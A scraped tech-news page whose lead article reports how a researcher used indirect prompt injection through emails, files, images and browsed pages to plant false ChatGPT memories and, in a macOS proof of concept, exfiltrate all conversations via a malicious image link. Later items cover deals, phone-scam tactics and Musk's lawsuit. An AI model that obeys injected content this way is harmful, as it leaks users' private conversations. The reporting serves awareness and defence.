Connect with us

Technology

How a researcher hacked ChatGPT's memory to expose a major security flaw

Published

on

How a researcher hacked ChatGPT's memory to expose a major security flaw

ChatGPT is an amazing tool, and its developer, OpenAI, keeps adding new features from time to time.

Recently, the company introduced a new memory feature in ChatGPT, which essentially enables it to remember things about you. For example, it can recall your age, gender, philosophical beliefs and pretty much anything else. 

These memories are meant to remain private, but a researcher recently demonstrated how ChatGPT’s artificial intelligence memory features can be manipulated, raising questions about privacy and security.

I’M GIVING AWAY A $500 GIFT CARD FOR THE HOLIDAYS

Advertisement

ChatGPT introduction screen. (Kurt “CyberGuy” Knutsson)

What is ChatGPT’s Memory feature?

ChatGPT’s memory feature is designed to make the chatbot more personal to you. It remembers information that might be useful for future conversations and tailors responses based on that information, even if you open a different chat. For example, if you mention that you’re vegetarian, the next time you ask for recipes, it will provide only vegetarian options. 

WHAT IS ARTIFICIAL INTELLIGENCE (AI)?

You can also train it to remember specific details about you, such as saying, “Remember that I like to watch classic movies.” In future interactions, it will tailor recommendations accordingly. You have control over ChatGPT’s memory. You can reset it, clear specific memories or all memories, or turn this feature off entirely in your settings.

ChatGPT hack 2

A prompt on ChatGPT. (Kurt “CyberGuy” Knutsson)

WINDOWS FLAW LETS HACKERS SNEAK INTO YOUR PC OVER WI-FI

Advertisement

The security vulnerability in ChatGPT

As reported by Arstechnica, security researcher Johann Rehberger found that it’s possible to trick the AI into remembering false information through a method called indirect prompt injection. This means the AI can be manipulated into accepting instructions from unreliable sources like emails or blog posts.

For instance, Rehberger demonstrated that he could trick ChatGPT into believing a certain user was 102 years old, lived in a fictional place called the Matrix and thought the Earth was flat. After the AI accepts this made-up information, it will carry it over to all future chats with that user. These false memories could be implanted by using tools like Google Drive or Microsoft OneDrive to store files, upload images or even browse a site like Bing — all of which could be manipulated by a hacker.

Rehberger submitted a follow-up report that included a proof of concept, demonstrating how he could exploit the flaw in the ChatGPT app for macOS. He showed that by tricking the AI into opening a web link containing a malicious image, he could make it send everything a user typed and all the AI’s responses to a server he controlled. This meant that if an attacker could manipulate the AI in this way, they could monitor all conversations between the user and ChatGPT.

Rehberger’s proof-of-concept exploit demonstrated that the vulnerability could be used to exfiltrate all user input in perpetuity. The attack isn’t possible through the ChatGPT web interface, thanks to an API OpenAI rolled out last year. However, it was still possible through the ChatGPT app for macOS.

When Rehberger privately reported the finding to OpenAI in May, the company took it seriously and mitigated this issue by ensuring that the model doesn’t follow any links generated within its own responses, like those involving memory and similar features. 

Advertisement

HOW TO REMOVE YOUR PRIVATE DATA FROM THE INTERNET

ChatGPT hack 3

Johann Rehberger’s ChatGPT conversation. (Johann Rehberger)

CYBER SCAMMERS USE AI TO MANIPULATE GOOGLE SEARCH RESULTS

OpenAI’s response

After Rehberger shared his proof of concept, OpenAI engineers took action and released a patch to address this vulnerability. They released a new version of the ChatGPT macOS application (version 1.2024.247) that encrypts conversations and fixes the security flaw.

So, while OpenAI has taken steps to address the immediate security flaw, there are still potential vulnerabilities related to memory manipulation and the need for ongoing vigilance in using AI tools with memory features. The incident underscores the evolving nature of security challenges in AI systems.

The company says, “It’s important to note that prompt injection in large language models is an area of ongoing research. As new techniques emerge, we address them at the model layer via instruction hierarchy or application-layer defenses like the ones mentioned.”

Advertisement

How do I disable ChatGPT memory?

If you’re not cool with ChatGPT keeping stuff about you or the chance that it could let a bad actor access your data, you can just turn off this feature in the settings.

  • Open the ChatGPT app or website on your computer or smartphone.
  • Click on the profile icon in the top right corner of the screen.
  • Go to Settings and then select Personalization.
  • Switch the Memory option off, and you’re all set.

This disables ChatGPT’s ability to retain information between conversations, giving you full control over what it remembers or forgets.

ChatGPT hack 4

A man using ChatGPT on his laptop  (Kurt “CyberGuy” Knutsson)

DON’T LET SNOOPS NEARBY LISTEN TO YOUR VOICEMAIL WITH THIS QUICK TIP

Cybersecurity best practices: Protecting your data in the age of AI

As AI technologies like ChatGPT become more prevalent, it’s crucial to adhere to cybersecurity best practices to protect your personal information. Here are some tips for enhancing your cybersecurity:

1. Regularly review privacy settings: Stay informed about what data is being collected. Periodically check and adjust privacy settings on AI platforms like ChatGPT and others to ensure you’re only sharing information you’re comfortable with.

Advertisement

2. Be cautious about sharing sensitive information: Less is more when it comes to personal data. Avoid disclosing sensitive details such as your full name, address, or financial information in conversations with AI.

3. Use strong, unique passwords: Create passwords that are at least 12 characters long, combining letters, numbers, and symbols, and avoid reusing them across different accounts. Consider using a password manager to generate and store complex passwords.

4. Enable two-factor authentication (2FA): Add an extra layer of security to your ChatGPT and other AI accounts. By requiring a second form of verification, such as a text message code, you significantly reduce the risk of unauthorized access.

5. Keep software and applications up to date: Stay ahead of vulnerabilities. Regular updates often include security patches that protect against newly discovered threats, so enable automatic updates whenever possible.

6. Have strong antivirus software:  In an age where AI is everywhere, protecting your data from cyber threats is more important than ever. Adding strong antivirus software to your devices adds a critical layer of protection. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe. Get my picks for the best 2024 antivirus protection winners for your Windows, Mac, Android & iOS devices.

Advertisement

7. Regularly monitor your accounts: Catch issues early. Frequently check bank statements and online accounts for any unusual activity, which can help you identify potential breaches quickly. 

Kurt’s key takeaways

As AI tools like ChatGPT get smarter and more personal, it’s pretty interesting to think about how they can tailor conversations to us. But, as Johann Rehberger’s findings remind us, there are some real risks involved, especially when it comes to privacy and security. While OpenAI is able to mitigate these issues as they arise, it also shows that we need to keep a close eye on how these features work. It’s all about finding that sweet spot between innovation and keeping our data safe.

What are your thoughts on AI remembering personal details—do you find it helpful, or does it raise privacy concerns for you? Let us know by writing us at Cyberguy.com/Contact

For more of my tech tips and security alerts, subscribe to my free CyberGuy Report Newsletter by heading to Cyberguy.com/Newsletter

Advertisement

Ask Kurt a question or let us know what stories you’d like us to cover.

Follow Kurt on his social channels:

Answers to the most-asked CyberGuy questions:

New from Kurt:

Copyright 2024 CyberGuy.com. All rights reserved.

Advertisement

Continue Reading
Advertisement
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Technology

The best Cyber Monday robot vacuum deals you can get from iRobot, Roborock, and more

Published

on

The best Cyber Monday robot vacuum deals you can get from iRobot, Roborock, and more

Robot vacuums are on sale all the time. But this holiday shopping weekend, there have been some fairly significant price drops, which are rolling over from Black Friday into Cyber Monday. These include rarely reduced flagship models like Roborock’s S8 MaxV Ultra and iRobot’s Combo 10 Max. If you’ve been holding out on trying the latest and greatest, now is a good time to dive in.

Deep discounts are also available on some of our favorite midrange and budget bots from Shark and Eufy, and iRobot is slashing prices on its entire line. Read on for our rundown on the best deals on robotic floor cleaners this holiday shopping weekend.

Update, December 1st: Adjusted to reflect current pricing/availability for Cyber Monday and added new deals, including the Roborock Q8 Max Plus.

Continue Reading

Technology

9 ways scammers can use your phone number to try to trick you

Published

on

9 ways scammers can use your phone number to try to trick you

Scammers have various methods when it comes to getting their hands on your phone number. You might think, “Well, what’s the big deal? Isn’t it easy to find someone’s number these days, no matter what?” Yes. And if you’ve already had your fair share of telemarketers call you, maybe you feel like you’ve got it under control.

The problem is that scammers with the right knowledge and the wrong intentions can wreak havoc just by having your phone number in their possession. 

Once they do, they can use it to trick you in all sorts of ways. 

The good news is that by familiarizing yourself with their tactics, you can be one step closer to preventing yourself from falling victim to them. Here’s what you need to know.

2 DAYS LEFT! I’M GIVING AWAY A $500 GIFT CARD FOR THE HOLIDAYS (Ends 12/3/24, 12 pm PT)

Advertisement

Illustration of a scammer using SIM swapping  (Kurt “CyberGuy” Knutsson)

9 ways you can get scammed if your phone number falls into the wrong hands

In today’s digital age, your phone number is more than just a way for friends and family to reach you. It can be a gateway for scammers to access your personal information and wreak havoc on your life. From phishing attempts to extortion, the risks are numerous and varied. Here are nine ways scammers can exploit your phone number if it falls into the wrong hands:

1. Phishing for other personal information

Scammers can also use your phone number to launch rather easy phishing attacks. They might send text messages or make calls posing as your bank or a popular online service that you subscribe to. The goal is to call you and trick you into providing login credentials, credit card details or other personal information, which they can then use for fraudulent activities. And once they have all your other information, they can do a lot more damage just by having your phone number as that initial segue.

2. Extortion and blackmail

In some cases, scammers use your phone number for extortion or blackmail. They may claim to have compromising information about you and demand payment to keep it private. By contacting you directly, they can apply continuous pressure, making their threats seem more real and immediate.

One unique way they do this to target elderly people is by pretending to be your grandchild or another relative in distress. The scammer often claims that your grandchild is in an emergency situation — such as needing bail money or medical assistance — and urgently requests financial help. With AI voice cloning technology, they may even be able to use your grandchild’s voice. This emotional manipulation usually gets the victim to pay up.

Advertisement

3. Robocalls and spam messages

This one may not be as dramatic, but your phone number can be sold to robocall and spam message services. These automated systems bombard you with unwanted calls and texts, often promoting scams or fraudulent products. While these may seem like minor annoyances, they can lead to bigger scams if you engage with the messages or follow their instructions. Hang up on them.

HOW TO STOP ANNOYING ROBOCALLS

man with cash

Illustration of a scammer with cash in his hand  (Kurt “CyberGuy” Knutsson)

4. Phone number spoofing

Phone number spoofing is a common tactic where scammers disguise their caller ID to appear as a trusted contact by calling from what appears to be a familiar number as it may have the same area code where you live, an area code where your friends or family live or even the actual phone number of someone close which you can recognize.

This makes it more likely that you’ll answer the call, giving them the opportunity to deceive you into revealing personal information or transferring money. This is, of course, the case when phone spoofing is used against you. But in situations where they use YOUR phone number, they can be scamming those close to you without you even knowing!

5. Impersonating government agencies

With these phone spoofing tactics, scammers can use your phone number to impersonate government officials, such as IRS agents or Social Security administrators. They may call you claiming there’s an urgent issue, like unpaid taxes or suspicious activity involving your Social Security number. This ploy often involves threats of legal action or arrest to pressure you into providing sensitive information or making immediate payments.

Advertisement

6. Calling about fake unpaid invoices

Instead of pretending to be from a government agency, another trick is for scammers to try their luck by posing as a representative from a utility company, like an electric or water company. Scammers will claim that you have an overdue invoice and threaten to cut off your service unless you pay immediately. Using your phone number, they can contact you repeatedly, making the scam seem more legitimate (and pressing).

7. SIM swapping/phone rerouting

SIM swapping or a port-out scam is when scammers transfer your phone number to a new SIM card in their possession. By convincing your mobile carrier to reroute your number, they can receive all your calls and messages, including those containing two-factor authentication codes. This allows them to bypass security measures and take over your online accounts.

WHAT IS ARTIFICIAL INTELLIGENCE (AI)?

8. Stealing your sensitive data

With SIM swapping techniques/port-out, scammers can also use your phone number as a key to access sensitive data stored in your online accounts. By initiating password resets and intercepting verification codes sent via SMS, they can gain unauthorized access to your email, social media and banking accounts, leading to significant personal and financial damage.

9. Setting up fake online accounts

Finally, scammers can use all the tactics above to not only access the accounts you already have but also create fake online accounts in your name. These accounts can be used for a variety of malicious purposes, such as spreading malware, launching further scams or conducting identity theft. The presence of your phone number makes these accounts appear more legitimate, increasing the chances of deceiving others.

Advertisement
man on phone

A man receiving a scam call (Kurt “CyberGuy” Knutsson)

10 SIMPLE STEPS TO IMPROVE YOUR SMARTPHONE’S SECURITY AND PRIVACY

How to protect yourself from these scams

To protect your phone number from falling into the hands of scammers, here’s what you can do:

1. Be cautious about sharing your phone number publicly: Avoid posting your phone number on public forums, websites or social media platforms where it can be easily accessed by scammers.

2. Limit exposure of your phone number on social media and other online platforms: Use privacy settings to restrict who can see your contact information. Most social media platforms and online services offer privacy settings that allow you to control who can view your personal information. Make sure to review and adjust these settings regularly. Only share your phone number with trusted contacts.

3. Consider using a secondary number for online registrations and transactions: Services like Google Voice can provide you with a secondary number that you can use for online activities, keeping your primary number private.

Advertisement

4. Monitor your accounts regularly for unusual activity: Check your bank accounts, email and other online accounts for any signs of unauthorized access or suspicious activity.

5. Have strong antivirus software: The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.Get my picks for the best 2024 antivirus protection winners for your Windows, Mac, Android and iOS devices.

6. Use two-factor authentication apps instead of SMS-based verification where possible: Two-factor authentication (2FA) provides an extra layer of security that is more difficult for scammers to bypass compared to SMS-based verification.

7. Use an identity theft protection service: Identity theft companies can monitor personal information like your Social Security number, phone number and email address and alert you if it is being sold on the dark web or being used to open an account.  They can also assist you in freezing your bank and credit card accounts to prevent further unauthorized use by criminals. 

One of the best parts of using some services is that they might include identity theft insurance of up to $1 million to cover losses and legal fees and a white glove fraud resolution team where a U.S.-based case manager helps you recover any losses. See my tips and best picks on how to protect yourself from identity theft.

Advertisement

8. Remove your personal information from the internet: While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice.  They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet.  By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with the information they might find on the dark web, making it harder for them to target you. Check out my top picks for data removal services here. 

If scammers already have your phone number

If you suspect that scammers already have your phone number, take the following steps:

Contact your mobile carrier to alert them of the scam calls, especially if they come from the same number. Your carrier may be able to block the number or provide additional security measures.

Consider changing your phone number if the issue persists: If scam calls continue despite your efforts, changing your phone number may be the best solution.

Advertisement

Report any suspicious activity to the appropriate authorities: Contact your local law enforcement or consumer protection agency to report scams and seek advice on further actions.

Consider placing fraud alerts on your accounts: Fraud alerts can help protect your credit and financial accounts from unauthorized access.

Monitor your phone for unusual calls or messages: Keep an eye out for any unexpected calls or messages, and do not respond to them.

Check your phone bill for unauthorized charges: Regularly review your phone bill to ensure there are no unexpected charges, which could indicate that your number has been used fraudulently.

By following these steps, you can significantly reduce the risk of falling victim to phone number scams and protect your personal information.

Advertisement

RECLAIM YOUR PRIVACY BY DISABLING YOUR CELL PHONE CARRIER’S DATA TRACKING

Kurt’s key takeaways

Scams have become much more sophisticated these days, especially with artificial intelligence, making it easier for scammers to target more people and get away with it. Always be wary of a scam. If you think something seems strange, it’s probably best to go with your gut.

Have you ever experienced a scam involving your phone number? If so, how did you handle it? Let us know by writing us at Cyberguy.com/Contact

For more of my tech tips and security alerts, subscribe to my free CyberGuy Report Newsletter by heading to Cyberguy.com/Newsletter

Advertisement

Ask Kurt a question or let us know what stories you’d like us to cover

Follow Kurt on his social channels

Answers to the most asked CyberGuy questions:

New from Kurt:

Copyright 2024 CyberGuy.com.  All rights reserved.

Advertisement

Continue Reading

Technology

Elon Musk targets OpenAI’s for-profit transition in a new filing

Published

on

Elon Musk targets OpenAI’s for-profit transition in a new filing

In a new motion filed late Friday in his lawsuit against OpenAI, Elon Musk’s attorneys have asked for a preliminary injunction to stop OpenAI from transitioning to a for-profit enterprise, reports TechCrunch. They also asked the judge to forbid the company from continuing alleged practices that they say violate US antitrust laws.

Musk’s lawyers claim that because of CEO Sam Altman’s alleged self-dealing, OpenAI “will likely lack sufficient funds to pay damages” if Musk wins the suit. The motion follows reports of OpenAI’s intent to become a for-profit business and that it recently began early talks with regulators to move its structural change forward.

As for antitrust claims, Musk’s lawyers allege that OpenAI and Microsoft “told investors not to fund their mutual competitors,” which they say violates the Sherman Act. And they claim that Musk “verified that at least one major investor” that had previously contributed to an xAI funding round has since “declined to invest in xAI.”

They also allege that OpenAI benefits from “wrongfully obtained competitively sensitive information” gained through Microsoft connections they insist are effectively prohibited under the Clayton Act. The lawyers claim that “the very reason Microsoft obtained its board seat” — referring to Microsoft VP Dee Templeton’s time as a non-voting board member at OpenAI — “was to coordinate business decisions with OpenAI.”

OpenAI spokeswoman Hannah Wong said in a statement emailed to The Verge:

Advertisement

Elon’s fourth attempt, which again recycles the same baseless complaints, continues to be utterly without merit.

Update November 30th: Added statement from OpenAI spokeswoman Hannah Wong.

Continue Reading

Trending